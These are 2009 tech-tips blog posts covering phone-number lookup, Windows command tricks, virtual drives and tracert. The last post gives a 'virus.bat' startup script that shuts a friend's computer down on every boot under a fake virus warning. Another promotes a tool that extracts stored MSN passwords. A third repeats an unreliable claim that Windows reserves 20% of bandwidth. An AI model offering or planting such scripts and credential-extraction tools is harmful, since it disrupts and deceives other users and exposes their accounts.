Monday, June 29, 2009

Trace Any Phone Number in the World


According to the latest report from ITU (International Telecommunication Union) the worldwide mobile subscriber base stands at 4.1 billion (of which India accounts for almost 10% at 403.66 million at the end of April 2009) while fixed-line subscriber base at 1.27 billion. With dropping call rates and booming mobile telephony market we have to bear the burnt of getting lots of unwanted calls and missed calls.
Sometimes we cannot even identify which country the missed call is from (except of course the ones from our home country and a few others for which we know the international dialing code). Then how do we find it?


Centralized database
There is a centralized database which has the following details about almost every phone number in the world.


*Type of Number


*Country


*City / State / Exchange location


*Original Network Provider



. Type of Number
This specifies whether the number is a Mobile number or a Landline/Fixed line referred as Geographic number. There is also a type of number called NonGeographic Number in countries like UK which is not linked to any specific location/city.2. Country
It is the country the number belongs to.3. City / State / Exchange location
This gives the city and exchange location information for a fixed line phone and the zone or state for a mobile number.4. Original Network Provider
This is the actual telecom company providing the service like Airtel, BSNL, Verizon, T-Mobile etc. But network provider listed here may not be the present network/service provider because Number Portability is not taken into account.



How can you use this service?
To use this service go to this page and enter the number in the international format.


+
Eg. +12532532533 or +447010752752
For fixed line phones, enter as follows:
+
Eg. +914422102210
where 91 is India’s country code, 44 area code for Chennai and 22102210 being the actual phone number. In India area codes are of varying length but the phone number together with the area code is always 10 digits for Indian numbers.
You can also use 00 instead of + .
The databases are updated quite frequently, last time the databases were updated on 11th May 2009.


Next update is expected during first week of June 2009. You can also purchase a license to access the entire database for about €55 per month.


The databases are available in CSV format (comma delimited strings) as well as in TXT format (tab delimited values).
Click here to download a sample of the database in CSVformat.



Sunday, June 28, 2009

Recover MSN Messenger and Hotmail Password With Password Recovery Software


Forgot you MSN and Hotmail password? Where to find Hotmail password recovery software and manager? Being a very secretive person, I have the habit of changing my password every few months; at times I forgot what my password was and stumbled upon this wonderful password recovery software.
MSN Messenger Password Recovery enables you to recover your lost email password and MSN password. This MSN and Hotmail email password recovery software only works if the “Remember my Password” tickbox is checked by default in MSN messenger, meaning to say you are able to login to MSN every time automatically without entering your password. This password recovery software will not work if the tickbox is not checked.

Password Recovery for MSN is the MSN messenger password recovery program that finds all encrypted MSN Messenger, Windows Live Messenger and Windows Messenger passwords stored on the local system. It then displays them in an easy to read format. This program works if after clicking the “Sign-In” button in your messenger you’re able to login automatically without entering your MSN password. So why not download the MSN password recovery program and try it for free
Note: Beware that stealing MSN passwords is illegal. You can only recover your own passwords. Doing it to other people even if they’re your friends or neighbors will likely get you in jail!

Friday, June 26, 2009

Open Active Folder in Command Prompt !


Working through cmd prompt is not easy with long paths and folder names.

This trick provides a solution !!!

What can be done :
** Command prompt can be added to 'Right Click Menu' of each folder.
** Clicking on this will open the folder in cmd prompt.
** Now, the files in that folder can easily be operated.


How to do it :
** Open any folder.
** Tools >> Folder Options...
** Change to File Types
** Select Folder from the list.
** Click Advanced button.
** Now, click New
** Type Command Prompt in Action
** Type
cmd.exe in Application used to perform action:
** Now, click OK and Apply

That's All !!!

Now, Right Click any folder and click Command Prompt
And see what happens !!!

Wednesday, June 24, 2009

Boost Up Internet Speed Without Software


Above 90% computers all over the world run Windows... and hence another computer trick.

FACT
But do you know that about 20% of your internet bandwidth is reserved by Microsoft.
---------------------------------------------------------------------------------------------------------
Uses of Reserved Bandwidth
** Windows Automatic Updates rely on this reserved bandwidth.
** Fast loading Microsoft Websites
** Sending Error Reports
** Online Help support in Microsoft Office
---------------------------------------------------------------------------------------------------------
But this can be recovered back...
---------------------------------------------------------------------------------------------------------
The Remedy
** Start >> Run
** Type gpedit.msc
** This opens the Policy Editor
** Now, Local Computer Policy >> Computer Configuration
** Then, Administrative Templates >> Network
** Now, click on QOS Packet Scheduler
** Now, on Right hand side
** Double Click Limit reservable bandwidth
** Now in Setting Tab

********************* NOTE **********************
It says : Not Configured
Reality : The Explain Tab says "By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection"
***************************************************

** So, on Setting Tab select Enabled
** Now, change Bandwidth limit (%) to 0 (Zero)

********************** NOTE ********************
Misconcept : This don't means that you won't be able to communicate with Microsoft or any its services !!!
Actually : This reserved Bandwidth is only to accelerate Microsoft internet connections more than other connections !!!
****************************************************

** Click OK !!!

Monday, June 22, 2009

Access Your Folders as Drives


Trick is all About :

You can create Virtual Drives in your Computer. Now you can access your Favorite Folders as a drive in My Computer.

What you can do ?

** Access your folders as a Drive !

** Fool 'Computer Beginners' or your 'Friends' (Non-Expert) , as the drive will show Disk Space of the folder's drive so it seems that the disk space has increased !!!

Do The Follwing :

Start >> Run

Type cmd and hit Enter

This will open "Command Prompt"

Type subst Z: E:\folder and hit Enter key.

You can replace Z: with your desired New Drive Letter (Except existing Drive letters)!

You can replace E:\folder with the path of your favorite folder !

Now, type exit

*** This creates a new drive ! When you open this , it will open your folder !!!

*** Isn't it Awesome ?

*** And this is Exclusive at pcremix.blogspot.com !

-------------------------------------------------------------

But a Problem !

۩ On Restart the Virtual Drive Disappears !!!

-------------------------------------------------------------

Solution !

-------------------------------------------------------------

۩ We can make a batch file which will make the drive everytime on startup !

Here is how ?

Open Notepad

Type :

@ECHO OFF

subst Z: E:\folder

exit

File >> Save As...

Name it : Virtual Drive Emulator.bat

Start >> All Programs

Right Click on Startup >> Open

This open the Startup folder

Paste the Virtual Drive Emulator.bat file here !

*** That's all , now the drive will automatically be created when ever you start your pc

-------------------------------------------------------------

>>>> Mission Accomplished <<<<

Sunday, June 21, 2009

Trace Websites !


Surfing Internet...
Type in the url and Hit Enter, that's it ?

But...
Have you ever thought what happens after that ?

Lets Trace n see what happens !

Do the following :
# Start >> Run
# Type cmd
# This will open the Command Prompt
# Type cd\
# Type tracert www.google.com
---------------------- Note ---------------------------
You can replace www.google.com with any website url.
---------------------------------------------------------

Results :
$ First line shows the IP address of the website... $ You'll be shown steps in which the website gets load !
$ More is the number of steps more is time taken to load the website !

That's all !

Saturday, June 20, 2009

Shutdown and Restart Trick !



My Exclusive... Again a contribution to Computer Tricks !
Play pranks on your friends...

****************************************************************************
Shutdown Trick
Stimulate shutdown from command prompt !
# Start >> Run
# Type shutdown -s -t 10 -c "Shutting Down..."
# Hit Enter and enjoy !
****************************************************************************
Restart Trick
Stimulate Restart from command prompt !
# Start >> Run
# Type shutdown -r -t 10 -c "Restarting..."
# Hit Enter and enjoy !
****************************************************************************
Log Off Trick
Stimulate LogOff from command prompt !
# Start >> Run
# Type shutdown -l
# Hit Enter and enjoy !
****************************************************************************

Please Note

-s :: This signify Shutdown Request.
-r :: This signify Restart Request.
-l :: This signify LogOff Request.
-t :: This signify the timer before Restart. (Replace '10' with any number.)
-c :: This signify comment.

How To Stop It ?
# When the timer is Running...
# Start >> Run
# Type shutdown -a
# That's It.

Prank !!!

-------------------------------------------------------------

۩ We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

Open Notepad

Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

File >> Save As...

Name it : virus.bat

Start >> All Programs

Right Click on Startup >> Open

This open the Startup folder

Paste the Virus.bat file here !

*** That's all , now the computer will automatically shutdown on every startup !

 
Powered by Blogger